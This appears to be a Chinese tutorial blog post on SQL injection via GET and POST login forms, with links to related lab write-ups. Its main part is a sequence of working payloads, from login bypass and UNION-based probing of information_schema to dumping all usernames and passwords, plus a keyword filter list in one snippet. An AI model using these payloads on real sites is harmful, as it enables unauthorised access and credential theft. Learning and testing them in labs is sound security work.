web渗透—— SQL基于GET POST注入

最新推荐文章于 2024-07-31 22:16:18 发布
最新推荐文章于 2024-07-31 22:16:18 发布
阅读量4.8k 收藏 8
点赞数
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/79965880
版权

0x00 前言

之前我们学习了这些知识。

这里写图片描述

0x01 小知识

1.万能登录

1' or 1=1 #

2. 判断字段数

uname=123' order by 2 # &passwd=&submit=Submit

3. 联合查询

uname=123' union select  1,2 # &passwd=&submit=Submit

4.查询数据库具体信息

uname=123' union select  version(),database() # &passwd=&submit=Submit

这里写图片描述

5. 查询当前数据库的所有表

uname=123' union select 1, group_concat(table_name)from information_schema.tables where table_schema=database() # &passwd=&submit=Submit

6.查看表中的字段名

uname=123' union select 1, group_concat(column_name)from information_schema.columns where table_name='users' # &passwd=&submit=Submit

7.输出所有的用户名和密码

uname=123' union select group_concat(username), group_concat(password) from users# &passwd=&submit=Submit
王嘟嘟_
关注
【漏洞挖掘】——119、HTTP头部注入介绍
Fly_鹏程万里
06-27 189
User-Agent:使得服务器能够识别客户使用的操作系统,游览器版本(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据中)Cookie:网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])Clien-IP:同上。
小白必读记——内网渗透之SQL注入基本原理和攻击(超级详细的哦)(一)
weixin_45900492的博客
12-03 1794
前言 在对信息安全的学习中,我们要时刻保持好奇心,多问为什么,要多去探究根本原理, 而不是只会使用工具和死记硬背,遇到不会又搜不到答案的问题,我们要大胆猜想, 小心求证,只有这样我们才能不断的进步,在信息安全的领域越走越远 重要部分请大家多读几遍 o! Web入侵先遣—SQL注入攻击技术初探 了解TA的前世今生 SQL注入式攻击技术,一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因,...
SQL注入POST注入
studyphp123的博客
04-23 1274
一、预备知识 二、实验目的 三、实验工具 浏览器、Burpsuite 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-11/,页面正常。 第二步:加入单引号会报错。 1)打开 burpsuite,界面如下: 2)打开 Firefox,选项 -> 高级 -> 设置-> 手动配置代理 3)访问 http:/...
POST_sql注入
D_Dwjh的博客
08-10 703
POST注入,主要特征是有提交的表单!!! 因为GET和POST最大的区别是,一个参数是在url里面显示,另一个是在body中显示。 所以在弄POST注入的时候,是通过提交表单来实现的!!! 其实POST注入也是那5个规则: 1.首先找到注入点 2.探测页面字段数 3.探测输出点 4.探测数据库名和表名 5.获取字段值 开始~ 靶场POST_rank1练手: 首先打开靶场,先看一下查询语句,发现有2个参数,一个是“username”,另一个是“password”。 看了一下,思考……感觉可以通过闭合引号+
PostgreSQL如何入门学习?
最新发布
分享Python、数据分析、人工智能前沿知识
07-31 411
在各种数据岗招聘中,SQL几乎成为了必备技能。有公司的地方就会有数据,有数据的地方就会有数据库,有数据库的地方就会有SQLSQL在数据分析中到底有多重要?这么说吧,除了Excel外,SQL是数据工作最常接触的到的工具。虽然本质上SQL和Excel都用来处理分析数据,但不一样的是,SQL是一种查询语言,并非可视化的软件,所以学习门槛更高,需要使用者有多的逻辑思考。当然学习SQL并非难事,对比Java、C++、Python这类编程语言,SQL的语言逻辑更为简单,你可以从SQL的3个功能来初步了解它。
SQL注入---POST注入
zhoutong2323的博客
04-07 950
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
简单的POST sql注入
m0_56757094的博客
08-29 735
简单的POST注入
sql注入--POST注入
pakho_C的博客
01-04 4422
sql注入POST注入 靶场:sqli-labs-master 下载链接:靶场下载链接 POST和GET的区别 GET提交的数据会显示在URL中,POST则不会。这是最显而易见的差别。这点意味着GET更不安全(POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST会再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都会创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
SQL注入——渗透day06
qq_62716256的博客
08-12 1007
SQL注入——渗透day06
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5045
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 881
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
SQL-Post注入
Code-5的博客
04-17 404
在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,提交到服务器后服务器再进行验证。这就是一次post的过程的。在输入正确的用户名和密码后显示尝试会不会回显报错信息,输入admin'--+,回显报错了。尝试万能密码 admin’or’1’='1# ,成功登录并且回显信息。尝试联合注入显示数据库名了。
SQL注入--POST注入
weixin_52151447的博客
11-19 3678
post注入与get注入区别在于POST注入在传参时不会将
Sql注入-POST注入
purvispanwu的博客
12-19 2891
sql注入,网络安全
SQL注入post注入
游魂的博客
12-06 2025
Post注入: 一般存在搜索框或登入页面位置,需要用burp抓包查看。 可以看到post数据中nama表单传的值为hack 用hackbar插件post数据中将传的值后面输入单引号或and 或 order by测试 输入单引号报错,查不到任何数据,由此判断存在post注入。 由于测试的为搜索框所以测试语句为%%27%23,才能正常查询出数据 注意在hackbar中是需要url编码才可以。 确...
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 5086
SQL注入原理-POST注入
get post注入原理
weixin_30360497的博客
05-08 525
一般的http请求不外乎 get 和 post两种,如果过滤掉所有post或者get请求中的参数信息中的非法字符,那么也就实现了防SQL注入。 首先定义请求中不能包含如下字符: '|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare 各个字符用"|"隔开,然后再判断R...
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 951
SQL注入-POST注入方法教学
WEB漏洞:直接下载关键文件——SQL注入与渗透测试详解
在"直接下载关键文件 - WEB常见攻击与渗透测试"这篇文档中,主要探讨了Web应用中常见的安全威胁之一——下载漏洞,特别是针对动态页面中存在的可被直接下载的敏感文件。这些文件可能包括数据库文件(如mdb, mdf等)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值